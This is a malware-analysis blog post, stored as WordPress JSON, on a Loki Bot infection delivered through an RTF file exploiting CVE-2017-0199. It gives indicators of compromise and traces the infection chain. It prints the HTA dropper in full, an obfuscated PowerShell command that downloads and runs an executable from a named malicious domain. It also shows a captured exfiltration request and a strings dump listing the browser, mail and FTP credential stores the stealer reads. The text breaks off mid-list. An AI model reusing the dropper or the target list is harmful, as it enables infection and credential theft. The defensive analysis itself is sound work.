{"id":879,"date":"2017-06-24T13:08:07","date_gmt":"2017-06-24T12:08:07","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=879"},"modified":"2017-06-26T09:55:14","modified_gmt":"2017-06-26T08:55:14","slug":"2017-06-23-loki-bot-malware-using-cve-2017-0199","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=879","title":{"rendered":"2017-06-23 Loki Bot Malware Using CVE 2017-0199"},"content":{"rendered":"

Looking for some malspam yesterday and I came across something that looks like it was exploiting the CVE 2017-0199 vulnerability in MS Office RTF files. FireEye did a nice write-up of this which you can read here<\/a>. Googling to see if anyone else had seen these domains before, I was able to find that @Security Doggo<\/a> had a sample back on the 14th of June for the dev[.]null[.]vg domain and that Sophos has written about the domain toopolex[.]com domain in their “Troj\/Fareit-DEB” report<\/a>. Running the PCAP through Network Total’s tool<\/a>, I saw that it is labeling this infection as part of the Loki Bot family. <\/p>\n

As usual, the malware and artifacts can be found over on my Github here<\/a>.<\/p>\n

Indicators of Compromise
\n========================
\n104.27.187.29 \/ dev[.]null[.]vg (HTTPS GET)
\n91.134.253.60 \/ toopolexlounge[.]com (HTTPS GET)
\n91.134.253.60 \/ toopolex[.]com (HTTP POST)<\/p>\n

Artifacts
\n=========
\nFile name: RFQ.doc
\nFile size: 3.5KB
\nFile location: NA
\nMD5: 9fdb7fcb522edad880317544dc1c31c4
\nVirustotal: http:\/\/virustotal.com\/en\/file\/f239b0d9e4286b3e01e93c963e55fcc650ebf8f2ff183518a120029a7519c122\/analysis\/<\/a>
\nDetection ratio: 25 \/ 56
\nFirst submission: 2017-06-12 06:57:03 UTC
\nMalwr: http:\/\/malwr.com\/analysis\/MzQxOTI2NGFkNWQ3NDA1NGJiMWYzZjM2NDZhNGIwNTQ\/<\/a>
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/f239b0d9e4286b3e01e93c963e55fcc650ebf8f2ff183518a120029a7519c122?environmentId=100<\/a><\/p>\n

File name: RFQQ.exe \/ vbyu.exe
\nFile size: 729KB
\nFile location: NA
\nMD5: 40dc770b29bf8e5bd08dc35e3f8db1fa
\nVirustotal: http:\/\/virustotal.com\/en\/file\/cb7d66dc1614c74879bd20bb2ae48beb3a0032231ffc75a2f1e30f0470ca56a1\/analysis\/<\/a>
\nDetection ratio: 12 \/ 61
\nFirst submission: 2017-06-23 11:41:24 UTC
\nMalwr: NA
\nHybrid Analysis: NA<\/p>\n

File name: ofVYuVBj.hta
\nFile size: 1.2KB
\nFile location:
\nMD5: e6da4245d7f192c52d8faf9892b7ba59
\nVirustotal: http:\/\/virustotal.com\/en\/file\/0d1a87215aca7ba079d60dd88eaea3e289eb16f1b7460734e62f9cabc8fbca1e\/analysis\/<\/a>
\nDetection ratio: 13 \/ 57
\nFirst submission: 2017-06-23 01:00:23 UTC
\nMalwr: NA
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/sample\/0d1a87215aca7ba079d60dd88eaea3e289eb16f1b7460734e62f9cabc8fbca1e?environmentId=100<\/a><\/p>\n

File name: 3B859C.exe
\nFile size: 33KB
\nFile location: C:\\Users\\%username%\\AppData\\Roaming\\ABE9E3
\nMD5: d79f070423fdd3f01ce8c2ba3fbbc8ed
\nVirustotal: http:\/\/virustotal.com\/en\/file\/97bd627ebfc4d40b21ebaaed916a1ba53859520edc99537b37d042a0d5425a5a\/analysis\/<\/a>
\nDetection ratio: 0 \/ 61
\nFirst submission: 2011-03-12 15:50:37 UTC
\nMalwr: http:\/\/malwr.com\/analysis\/ZjA2Y2VmOTA4ZWZjNGM4OWJhM2VhMmZjMDdmZGI1NDg\/<\/a>
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/search?query=d79f070423fdd3f01ce8c2ba3fbbc8ed<\/a><\/p>\n

File name: 3B859C.hdb
\nFile size: 4B
\nFile location: C:\\Users\\%username%\\AppData\\Roaming\\ABE9E3
\nMD5: ed93b0b941ad67dfaa8f074555378d3f
\nVirustotal: NA
\nMalwr: NA
\nHybrid Analysis: NA <\/p>\n

File name: aot-otu
\nFile size: 2.8MB
\nFile location: C:\\Users\\%username%\\AppData\\Roaming\\bpe
\nMD5: dc95e6515bd27c8cdfd56e5764d2575c
\nVirustotal: NA
\nMalwr: NA
\nHybrid Analysis: NA <\/p>\n

File name: oki.exe
\nFile size: 750KB
\nFile location: C:\\Users\\%username%\\AppData\\Roaming\\bpe
\nMD5: 71d8f6d5dc35517275bc38ebcc815f9f
\nVirustotal: http:\/\/virustotal.com\/en\/file\/fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b\/analysis\/<\/a>
\nDetection ratio: 2 \/ 62
\nFirst submission: 2012-01-31 01:59:40 UTC
\nMalwr: NA
\nHybrid Analysis: http:\/\/www.hybrid-analysis.com\/search?query=71d8f6d5dc35517275bc38ebcc815f9f<\/a><\/p>\n

Analysis of Malware
\n===================<\/p>\n

\"\"<\/a><\/p>\n

The interesting thing with this file is that it is really a RTF file and not a true Microsoft Word document. When you look at the file via strings, you can see the header for RTF and not a Word document. Plus, when trying to run this document through OfficeMalScanner it told me that it had detected the RTF file format and to use RTFScan. When using that tool, I got the following.<\/p>\n

\"\"<\/a><\/p>\n

It was here that I tried one of the other tools when I am playing with Word docs or RTF files – OLETools from decalage2<\/a>. Using the command ‘python rtfobj.py RFQ.doc’ I got the following with an error at the end:<\/p>\n

\r\nfound object size 2601 at index 000000B1 - end 00000DD9\r\nsaving object to file <PATH REDACTED>RFQ.doc_object_000000B1.raw\r\nERROR    *** Not an OLE 1.0 Object<\/pre>\n
I took a look at this new file via a couple of different tools (strings, and Sublime) but did not see anything much. On a gut-feeling I opened the file in a hex editor to see if there was anything that I was missing. Using the xxd command (xxd RFQ.doc_object_000000B1.raw), I saw another URL.<\/p>\n
\"\"<\/a><\/p>\n
So we know how the initial infection starts. The RTF file reaches out to the URL of hxxps:\/\/dev[.]null.vg\/ofVYuVBj[.]hta and grabs that HTA file. Looking at the HTA file I get the following code:<\/p>\n
 \r\n<!DOCTYPE html>\r\n<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >\r\n<html>\r\n<body>\r\n<ScRIPt LaNGUAge="VBscRipt">\r\nWindow.ReSizeTo 0, 0\r\nWindow.moveTo -5574, -5808\r\ndiM lQmNAkzcRXsxTp : dIm NWBrqIyxxapExc : sET lQmNAkzcRXsxTp = createOBJEcT ( "wsCrIPt.sheLL" ) : NWBrqIyxxapExc = " POWershell.Exe -ExEcuTiOnPoLiCy bYPass -NoPrOFILe -wInDowStYLe hIDden -enCodEdCommaNd IABTAEUAdAAtAGMATwBOAHQAZQBuAHQAIAAtAFYAYQBsAFUARQAgACgAbgBlAHcALQBvAEIASgBFAEMAdAAgAFMAWQBzAHQAZQBtAC4AbgBFAFQALgBXAGUAYgBjAEwASQBlAE4AVAApAC4ARABPAHcATgBMAG8AQQBkAGQAQQBUAEEAKAAgAB0gaAB0AHQAcABzADoALwAvAHQAbwBvAHAAbwBsAGUAeABsAG8AdQBuAGcAZQAuAGMAbwBtAC8ANAA1ADUANgA2ADUANAA1AC8ANgA3ADUANgA1ADgAMwAvAEkATQBHAC8AUgBGAFEAUQAuAGUAeABlAB0gIAApACAALQBlAE4AYwBvAGQAaQBuAEcAIABiAHkAVABlACAALQBQAGEAdABoACAAHSAkAGUAbgBWADoAYQBQAHAARABhAFQAYQBcAHYAYgB5AHUALgBlAHgAZQAdICAAOwAgAHMAVABBAFIAdAAgAB0gJABFAG4AdgA6AGEAcABwAGQAYQB0AGEAXAB2AGIAeQB1AC4AZQB4AGUAHSA= " : lQmNAkzcRXsxTp.ruN CHr ( 34 ) & lQmNAkzcRXsxTp.eXPAndENvIroNMEnTSTrINGS( "%sYSTemROoT%" ) & "\\SYSTEM32\\WIndOWspOwerShell\\v1.0\\POweRsHElL.exe" & cHr ( 34 ) & chr ( 32 ) & cHR ( 34 ) & NWBrqIyxxapExc & ChR ( 34 ) , 0 : sEt lQmNAkzcRXsxTp = NOTHING\r\n<\/script>\r\n\r\n<\/body>\r\n<\/html><\/pre>\n
which after the BASE64 block of text is decoded you get the following Powershell script.<\/p>\n
\r\n<!DOCTYPE html>\r\n<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >\r\n<html>\r\n<body>\r\n<ScRIPt LaNGUAge="VBscRipt">\r\nWindow.ReSizeTo 0, 0\r\nWindow.moveTo -5574, -5808\r\ndiM lQmNAkzcRXsxTp : dIm NWBrqIyxxapExc : sET lQmNAkzcRXsxTp = createOBJEcT ( "wsCrIPt.sheLL" ) : NWBrqIyxxapExc = " POWershell.Exe -ExEcuTiOnPoLiCy bYPass -NoPrOFILe -wInDowStYLe hIDden -enCodEdCommaNd SEt-cONtent -ValUE (new-oBJECt SYstem.nET.WebcLIeNT).DOwNLoAddATA(  http:\/\/toopolexlounge.com\/45566545\/6756583\/IMG\/RFQQ.exe  ) -eNcodinG byTe -Path  $enV:aPpDaTa\\vbyu.exe  ; sTARt  $Env:appdata\\vbyu.exe " : lQmNAkzcRXsxTp.ruN " & lQmNAkzcRXsxTp.eXPAndENvIroNMEnTSTrINGS( "%sYSTemROoT%" ) & "\\SYSTEM32\\WIndOWspOwerShell\\v1.0\\POweRsHElL.exe" & " & ' ' & " & NWBrqIyxxapExc & " , 0 : sEt lQmNAkzcRXsxTp = NOTHING\r\n<\/script>\r\n\r\n<\/body>\r\n<\/html><\/pre>\n
It looks like it potentially downloads another binary (RFQQ.exe) from the site “hxxps:\/\/toopolexlounge[.]com,” and saves it to the %APPDATA% folder and re-names it vbyu.exe. <\/p>\n
Shifting gears to get a better idea of how this operates, I ran the RTF document in my test VM. When opening the file, I was presented with the following screen:<\/p>\n
\"\"<\/a><\/p>\n
shortly followed by this screen:<\/p>\n
\"\"<\/a><\/p>\n
Looking at Wireshark, the only traffic that I am able to see is when it went to the initial site ‘hxxps:\/\/dev[.]null.vg’ and managed to download the HTA file (the ofVYuVBj.hta file was in the Temporary Internet Files folder). I did not see anything in the APPDATA folder called “vbyu.exe” at that time. <\/p>\n
\"\"<\/a><\/p>\n
So I decided to run the ofVYuVBj.hta file directly since it did not fire on my test VM. Running that file, it opened up IE and presented me with the following:<\/p>\n
\"\"<\/a><\/p>\n
which I clicked on “Run.” Once I ran that file, I could see the MSHTA process spin up and then the Powershell process under that. I also saw that a couple of new files\/folders were created on my VM, one of them being the “vbyu.exe” file. When looking at the Process Tree via Process Monitor I could easily see the relationships between parent and child processes. <\/p>\n
\"\"<\/a><\/p>\n
Looking at Wireshark again, I could also see that the site “hxxps:\/\/toopolexlounge[.]com” had been contacted, along with some POSTs to the site “toopolex[.]com” with some details of my VM:<\/p>\n
\"\"<\/a><\/p>\n
\r\nPOST \/controllers\/user\/fre.php HTTP\/1.0\r\nUser-Agent: Mozilla\/4.08 (Charon; Inferno)\r\nHost: toopolex.com\r\nAccept: *\/*\r\nContent-Type: application\/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: BD5C680A\r\nContent-Length: 2594\r\nConnection: close\r\n\r\n..'.......ckav.ru......B.i.l.l.......B.I.L.L.-.P.C.......B.i.l.l.-.P.C.....\r\n...............k.................0...B.2.7.B.D.8.5.A.B.E.9.E.3.B.8.5.9.C.6.8.A.3.1.2.....iooo9t\t....H.c....ht.ps8:\/....r.ack?g\r\ne..om\/.<.%.,..df..l.wzi.5.!1.\t:..# M.ozil\/a.User.P..f.\r\nn..\r\n..\/* Do...t.edi.\r\n.h_s.f\\o.6.*.??I..youCmake.ch.ng.rNoJ*}zw..c .ap...c...on1=ru...`,.GB@?.w...b ovG..[.....G\r\nE..x:sN..To..1.nu.lMQ..p...,...(~v....DURL7lb..:c@..g.O\/".$u.._=.("....dA..E-\r\nkU..Tim....l$-bz.gr....'N..;r"..0);.J.D..lo...B(..oHIr.G-.:g.?.G.149.3828.6.P.x..- vgfn uT.%..f'.B..b..w.h.B.4v...k.....y.]35840J3....yG..m_.Fpo2.d...9O..GZ_A.ze..l.~u...1Z.R>..SGold.$x.@s.Y.~v.rui.T......t.yC.d.2.GB..05(...C+...ACD.N.i.wN...].P.y...2...T.tO..f3..1.8.7'5-)...O4eo6E8d...&.a2..3ec..k.B.*s..JF...7-!J..Z. ..ult.o..)b.5..u.b.Ve.gza.m#.7H.....aBpVSd..ag.V|..PiUm.oz-Y.+J%..e~.P.z.T]-t)\r\nBE....\/L\\*[C8.ui..Bs6.+3&k.sVd..e%...(....H,.x.S.0z..X\/..z==.P.a.#..{:XI.P..tv\r\n268?}$hLs2q5.8..=.D..Gw.k..J..I...)>lI.17<w.I...x;..;v..u)0..{\\...:..895W.G0...,"a.)6.t....c.&..EmD`..fp..73.2sr.z-y}...1..{47.v.(..z7...!.Q1.d0..#2j.h.5.)\r\n.0]..B....3R...C}6..K.k......*=t-b2mi..G...'...... ...C-.,V.[F.9.^..l..edA...l...#3R.\/..'6S\t!.._1V9-......8l...Zhl)dG..7.BI...vyi...@..l...%7B.2f..1#4-.6.b.w0.^..5.d.$1Uf..3;..N.D:5.4\/.,c ^2>cesn6b.08...va..5.3.t.`s86D.12.`.0o&>g{...`.........A.qVV56.].e-R.DZCToB.H{..$}aU...A.)9Y.E.Z.3P\r\n.f.]Sm8.p..d..O..z...3..h.w.S.B.c.1UI..kF..".n..R.dj.f.......z.[.`S.a.\r\nC4L-.Ho..\r\n;.K..#,df..C.......\tB..E.I}D....Ro)m(!..Th.n?Tb..B.P.{'91gw.g.zx.i...C...C..R.e...v..45T.I\\....d0..m..:.,F.,b.g..C....2s.K...[..m F...(x8(6)...Z.....t^...........7.}e-.y.tlR.y....,|.uEC\\..&.2\\:x-.yr.s.Z:..\r\nl...9Qw..&rn.9.s.1D-3ifJ.Q..b..2^...:...!9...#9.6.nmY.-.\r\n..5.F..4.F..4.+c[x.d..B.=&..h.U...-U...-.*va..."...^.)h...1..z.0..z<0zg.cko.bu..dID.;.UH...5..=...\/\/6m....>45.8.....l.~.......c....Ji...^.'2..K\t..f..smt.I....q2K<.t3.....ho00Z.l.e.%....p;-.u...7.2...hv.69....t.4$....ws..S.(w.xd.J..oI+Mx.J.CB......_...ghRt..NtD.1.Z..h....q...:3A..c....B.....\/r.@.o......=....s587.\/.p..h.l..^!0..!.Qbe.......::)|....H..skb+rd....pid@U821:6C.0.9v74E..`^..}-}d.b.5'.%u;d....R.aD.....8wx...F"..l|... ]D9.c-be4....f.8.7..5.....e9b3)"\\.quJo...nH..E0.&.*...oR..}d7=.l...=.xg\r\n$....4N.h.....#FZ0..6m..4Im2~|.n.6q2Ol89..2..WvkJ1.3.g..g.!3DP.}.G.l5.)4kf3....6Hkkx..w.2q5KhA.....6.h.LA.r^2.n~^..ac......F,x.........tw%...n.id..sM,:..f..l....hi.fy..\t.L..Z....._>e8.7H....82..+4M....0.m...T.-G......?.y.dbox....\r\nzD..Sufh.J.=28a4......n....>a.#911.b,f0..5.._7*][..o..uF..Sq[l....Q.D1.~....B\t\\.cdC...8..f.35....Fba0\r\n.....7. .d.*\t.b. ..X..A-B<\r\n..8.Jz6R9C.k...H5..\r\n\r\nHTTP\/1.1 404 Not Found\r\nDate: Fri, 23 Jun 2017 13:52:13 GMT\r\nServer: Apache\r\nConnection: close\r\nContent-Type: text\/html; charset=UTF-8\r\n\r\nFile not found.<\/pre>\n
Going back to look at the newly created files\/folders that were created on my VM, under one of the folders called “bpe” located at “C:\\Users\\%username%\\AppData\\Roaming\\” there were many different files that were written as seen below:<\/p>\n
\"\"<\/a><\/p>\n
Switching to Process Monitor and looking for the “oki.exe” file in the log, I noticed that the “vbyu.exe” process created the various files found under the “bpe” folder. I also noticed that when the two “oki.exe” process spun up, they also called two particular files that were created by the “vbyu.exe” process as a parameter or option perhaps.<\/p>\n
\r\nParent PID:\t2756\r\nCommand line:\t"C:\\Users\\%username%\\AppData\\Roaming\\bpe\\oki.exe" aot-otu \r\nCurrent directory:\tC:\\Users\\%username%\\AppData\\Roaming\\bpe\\\r\n-----\r\nParent PID:\t1124\r\nCommand line:\tC:\\Users\\%username%\\AppData\\Roaming\\bpe\\oki.exe C:\\Users\\%username%\\AppData\\Roaming\\bpe\\HYPQM\r\nCurrent directory:\tC:\\Users\\%username%\\AppData\\Roaming\\bpe\\\r\n<\/pre>\n
I was only able to capture the “aot-otu” file which has the following characteristics:<\/p>\n
File name: aot-otu
\nFile size: 2746KB
\nFile location: C:\\Users\\%username%\\AppData\\Roaming\\bpe\\
\nMD5: DC95E6515BD27C8CDFD56E5764D2575C
\nVirustotal: NA
\nMalwr: NA
\nHybrid Analysis: NA<\/p>\n
Looking at the strings of this file (aot-otu) showed a treasure-trove of information. Unfortunately I was not able to determine what it meant or what the code is doing. Further digging into the initial “oki.exe” process (PID 2756) and using the filter option of “CreateFile” under operation (a read operation can happen under the CreateFile operation) in Process Monitor, I can see that this process at least opened and read most, if not all the files in this directory. At this time I am not sure why.<\/p>\n
When looking at the other “oki.exe” child process (PID 1124), and using the same “CreateFile” filter, I could see that this process is touching just three files from the “bpe” folder: 1) ssu.ico, 2) spd, and 3) HYPQM. I also noticed that the child “oki.exe” process used the “HYPQM” file to, from what I could tell, register *something* with .NET via the Regsvcs.exe utility and created two more sub-processes off of it, both being “RegSvcs.exe.”<\/p>\n
\r\nPath: C:\\Users\\%username%\\AppData\\Roaming\\bpe\r\nCommand: C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe\r\nPID: 2416\r\nParent PID: 348\r\nDesired Access:\tExecute\/Traverse, Synchronize\r\nDisposition: Open\r\nOptions: Directory, Synchronous IO Non-Alert\r\nAttributes:\tn\/a\r\nShareMode: Read, Write\r\nAllocationSize: n\/a\r\nOpenResult:\tOpened\r\n-----\r\nPath: C:\\Users\\%username%\\AppData\\Roaming\\bpe\r\nCommand: C:\\Users\\%username%\\AppData\\Roaming\\bpe\\HYPQM\r\nPID: 1080\r\nParent PID: 348\r\nDesired Access:\tExecute\/Traverse, Synchronize\r\nDisposition: Open\r\nOptions: Directory, Synchronous IO Non-Alert\r\nAttributes:\tn\/a\r\nShareMode: Read, Write\r\nAllocationSize:\tn\/a\r\nOpenResult:\tOpened<\/pre>\n
The one “RegSvcs.exe” process (PID 2416) looked at many different file locations for what I am assuming are credentials and other sensitive information which is the standard MP for the Loki bot malware. It also created a registry key under the “HKCU\\\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u040b\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u045c\ufffd\ufffd\u041c\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u040a\ufffd\ufffd\ufffd\u0419\ufffd\ufffd\u044f\ufffd\ufffd” path with the following details:<\/p>\n
Type:\tREG_EXPAND_SZ
\nLength:\t56
\nData:\t%APPDATA%\\ABE9E3\\3B859C.exe<\/p>\n
The other “RegSvcs.exe” process (PID 1080), I believe, is the *something* that was registered with .Net since this was the process that was communicating via the POSTs found in Wireshark to the malicious site. This malware also maintains persistence via another registry setting found in “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” with the following details: “WindowsUpdate”=”C:\\Users\\%username%\\AppData\\Roaming\\bpe\\oki.exe C:\\Users\\%username%\\AppData\\Roaming\\bpe\\aot-otu” but unfortunately I was not able to determine what process was responsible for creating that registry key.<\/p>\n
\"\"<\/a><\/p>\n
Update 2017-06-24:<\/strong> Thanks to David Ledbetter (@Ledtech3 on Twitter<\/a>), he was able to find the “missing” process. I am not sure how I missed this one, but the “oki.exe” process was the process that created the “WindowsUpdate” key in “HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.” Thanks David!<\/p>\n
\"\"<\/a><\/p>\n
Update 2017-06-26:<\/strong> The stream that talks to the site \u201chxxps:\/\/toopolexlounge[.]com\u201d mentioned above looks to have two URLs in it (ckav[.]ru\ufeff and youCmake[.]ch[.]ng\ufeff). When Googling around for information about this malware, I came across the link<\/a> from Cysinfo that talked about the same URL as well. I ran the application “strings2<\/a>” against the two “RegSvcs.exe” processes, and created logs for each of them to investigate further. As seen below, there were some hits for applications to look for and obtain credentials from, along with the domain of “hxxp:\/\/toopolex[.]com\/controllers\/user\/fre[.]php” and the user agent as well and perhaps what is sent back to the site. There is a lot of mention around crypto as well in the one RegSvcs.exe process. I have updated the Github repo with these two strings2 output.<\/p>\n
\r\nAll of this snippet is from the pid816.log\r\n==========================================\r\n\r\nopen\r\n.tmp\r\n%s\\*\r\nWindows\r\nProgram Files\r\n%s\\%s\r\n%s\\%s\\%s%s\r\n%s\\%s%s\r\nUNIQUE\r\nSQLite format 3\r\nDlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW\r\nU2XpekVvtYq0fwsx7EDuZjrCo9GcF1B6Hl358mbznyLWdMANa4TSKJhIiOPgQR\r\nhttp:\/\/\r\nhttp:\/\/\r\nMachineGuid\r\nSOFTWARE\\Microsoft\\Cryptography\r\nSeDebugPrivilege\r\nntdll.dll\r\nLdrGetProcedureAddress\r\nRtlNtStatusToDosError\r\nRtlSetLastWin32Error\r\nZwQueryInformationProcess\r\nRtlCreateUserThread\r\nZwAllocateVirtualMemory\r\nNtFreeVirtualMemory\r\nNtWriteVirtualMemory\r\nZwReadVirtualMemory\r\nZwResumeThread\r\nlast_compatible_version\r\npassword_value\r\nusername_value\r\norigin_url\r\nlogins\r\n%s\\%s\\User Data\\Default\\Login Data\r\n%s\\%s\\User Data\\Default\\Web Data\r\n%s%s\\Login Data\r\n%s%s\\Default\\Login Data\r\nComodo\\Dragon\r\nMapleStudio\\ChromePlus\r\nGoogle\\Chrome\r\nNichrome\r\nRockMelt\r\nSpark\r\nChromium\r\nTitan Browser\r\nTorch\r\nYandex\\YandexBrowser\r\nEpic Privacy Browser\r\nCocCoc\\Browser\r\nVivaldi\r\nComodo\\Chromodo\r\nSuperbird\r\nCoowon\\Coowon\r\nMustang Browser\r\n360Browser\\Browser\r\nCatalinaGroup\\Citrio\r\nGoogle\\Chrome SxS\r\nOrbitum\r\nIridium\r\n\\Opera\\Opera Next\\data\r\n\\Opera Software\\Opera Stable\r\n\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\r\n\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\r\nvaultcli.dll\r\nVaultEnumerateItems\r\nVaultEnumerateVaults\r\nVaultFree\r\nVaultGetItem\r\nVaultOpenVault\r\nVaultCloseVault\r\nSoftware\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2\r\n%s%02X\r\nfile:\/\/\/\r\nSoftware\\Microsoft\\Internet Explorer\\TypedURLs\r\nSELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins\r\nhostname\r\nencryptedUsername\r\nencryptedPassword\r\n%s\\logins.json\r\n%s\\prefs.js\r\n%s\\signons.sqlite\r\nsignons.txt\r\nsignons2.txt\r\nsignons3.txt\r\n%s\\Mozilla\\Firefox\\profiles.ini\r\n%s\\Mozilla\\Firefox\\Profiles\\%s\r\n%s\\Mozilla\\SeaMonkey\\profiles.ini\r\n%s\\Mozilla\\SeaMonkey\\Profiles\\%s\r\n%s\\Flock\\Browser\\profiles.ini\r\n%s\\Flock\\Browser\\Profiles\\%s\r\n%s\\Thunderbird\\profiles.ini\r\n%s\\Thunderbird\\Profiles\\%s\r\n%s\\K-Meleon\\profiles.ini\r\n%s\\K-Meleon\\%s\r\n%s\\Comodo\\IceDragon\\profiles.ini\r\n%s\\Comodo\\IceDragon\\Profiles\\%s\r\n%s\\NETGATE Technologies\\BlackHawk\\profiles.ini\r\n%s\\NETGATE Technologies\\BlackHawk\\Profiles\\%s\r\n%s\\Postbox\\profiles.ini\r\n%s\\Postbox\\Profiles\\%s\r\n%s\\8pecxstudios\\Cyberfox\\profiles.ini\r\n%s\\8pecxstudios\\Cyberfox\\Profiles\\%s\r\n%s\\Moonchild Productions\\Pale Moon\\profiles.ini\r\n%s\\Moonchild Productions\\Pale Moon\\Profiles\\%s\r\n%s\\FossaMail\\profiles.ini\r\n%s\\FossaMail\\Profiles\\%s\r\n%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\\data\r\nProfile%i\r\nPath\r\nProfiles\/\r\nPATH\r\n%s\\nss3.dll\r\nNSS_Init\r\nNSS_Shutdown\r\nPK11_GetInternalKeySlot\r\nPK11_FreeSlot\r\nPK11_Authenticate\r\nPK11SDR_Decrypt\r\nPK11_CheckUserPassword\r\nSECITEM_FreeItem\r\nsqlite3.dll\r\nmozsqlite3.dll\r\nnss3.dll\r\nsqlite3_finalize\r\nsqlite3_step\r\nsqlite3_close\r\nsqlite3_column_text\r\nsqlite3_open16\r\nsqlite3_prepare_v2\r\nsqlite3_prepare\r\nCurrentVersion\r\nSOFTWARE\\Mozilla\\Mozilla Firefox\r\n%s\\%s\\Main\r\nInstall Directory\r\nPathToExe\r\nSOFTWARE\\Mozilla\\Mozilla Thunderbird\r\nSOFTWARE\\Mozilla\\FossaMail\r\nSOFTWARE\\Postbox\\Postbox\r\nSOFTWARE\\Mozilla\\Flock\r\nSOFTWARE\\Flock\\Flock\r\n(x86)\r\n%ProgramW6432%\r\n%s\\NETGATE\\Black Hawk\r\nSOFTWARE\\Mozilla\\Pale Moon\r\n%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\r\nSOFTWARE\\K-Meleon\r\nSetupPath\r\nSOFTWARE\\ComodoGroup\\IceDragon\\Setup\r\nRootDir\r\nSOFTWARE\\8pecxstudios\\Cyberfox86\r\nSOFTWARE\\8pecxstudios\\Cyberfox\r\nSOFTWARE\\mozilla.org\\SeaMonkey\r\n%s\\Mozilla\\Profiles\r\nSOFTWARE\\Mozilla\\SeaMonkey\r\nSOFTWARE\\Mozilla\\Waterfox\r\nffffff\r\nfirefox.exe\r\nkernel32.dll\r\nCloseHandle\r\nCreateFileW\r\nWriteFile\r\nExitProcess\r\nCrypt32.dll\r\nCryptStringToBinaryA\r\nShlwapi.dll\r\nStrStrA\r\nGetProcAddress\r\nLoadLibraryW\r\n%s\\Opera\r\nwand.dat\r\nX!2$6*9(SKiasb+!v<.qF58_qwe~QsRTYvdeTYb\r\nform_password_control\r\nform_username_control\r\nSoftware\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete\r\n%s\\QupZilla\\profiles\\default\\browsedata.db\r\narray\r\ndict\r\ndata\r\nstring\r\nServer\r\nInstallDir\r\nSOFTWARE\\Apple Computer, Inc.\\Safari\r\n%s\\Apple Computer\\Preferences\\keychain.plist\r\n%s\\Apple Application Support\\plutil.exe\r\n.xml\r\n-convert xml1 -s -o %s "%s"\r\n%s\\Data\\AccCfg\\Accounts.tdat\r\n%s\\Storage\r\nAccount.rec0\r\n%s\\Foxmail\\mail\r\n*.stg\r\n%SYSTEMDRIVE%\r\nFoxmail*\r\nEmailAddress\r\nTechnology\r\nPopServer\r\nPopPort\r\nPopAccount\r\nPopPassword\r\nSmtpServer\r\nSmtpPort\r\nSmtpAccount\r\nSmtpPassword\r\nSoftware\\IncrediMail\\Identities\r\nUserName\r\nPasswd\r\nPOP3Server\r\nPOP3Port\r\nEmail\r\nSMTP Email Address\r\nSMTP Server\r\nSMTP User Name\r\nSMTP User\r\nPOP3 Server\r\nPOP3 User Name\r\nPOP3 User\r\nNNTP Email Address\r\nNNTP User Name\r\nNNTP Server\r\nIMAP Server\r\nIMAP User Name\r\nIMAP User\r\nHTTP User\r\nHTTP Server URL\r\nHTTPMail User Name\r\nHTTPMail Server\r\nPOP3 Port\r\nSMTP Port\r\nIMAP Port\r\nPOP3 Password2\r\nIMAP Password2\r\nNNTP Password2\r\nHTTPMail Password2\r\nSMTP Password2\r\nPOP3 Password\r\nIMAP Password\r\nNNTP Password\r\nHTTP Password\r\nSMTP Password\r\nSoftware\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\r\nSoftware\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\r\n%s\\32BitFtp.TMP\r\n%s\\32BitFtp.ini\r\n%s\\Estsoft\\ALFTP\\ESTdb2.dat\r\n%s\\site.xml\r\n%s\\BitKinex\\bitkinex.ds\r\n*.tlp\r\n*.bscp\r\nLastUsedProfile\r\nSoftware\\Bitvise\\BvSshClient\r\n%s\\BlazeFtp\\site.dat\r\nSoftware\\FlashPeak\\BlazeFtp\\Settings\r\nLastPassword\r\nLastUser\r\nLastAddress\r\nLastPort\r\nServer\r\nPassword\r\n_Password\r\nSoftware\\NCH Software\\ClassicFTP\\FTPAccounts\r\nsettings\r\nname\r\nvalue\r\n%s\\Cyberduck\r\nuser.config\r\n%s\\iterate_GmbH\r\n%s\\EasyFTP\\data\r\nserver\r\nusername\r\nprotocol\r\n%s\\ExpanDrive\r\n*favorites.js\r\ndrives.js\r\n%s%c\r\nUser\r\nHostName\r\nSoftware\\Far\\Plugins\\FTP\\Hosts\r\nSoftware\\Far2\\Plugins\\FTP\\Hosts\r\n%s\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db\r\n%s\\FileZilla\\Filezilla.xml\r\n%s\\FileZilla\\filezilla.xml\r\n%s\\FileZilla\\recentservers.xml\r\n%s\\FileZilla\\sitemanager.xml\r\n%s\\FlashFXP\r\n*Sites.dat\r\n*quick.dat\r\nFtpServer\r\nFtpUserName\r\nFtpPassword\r\n_FtpPassword\r\nSoftware\\NCH 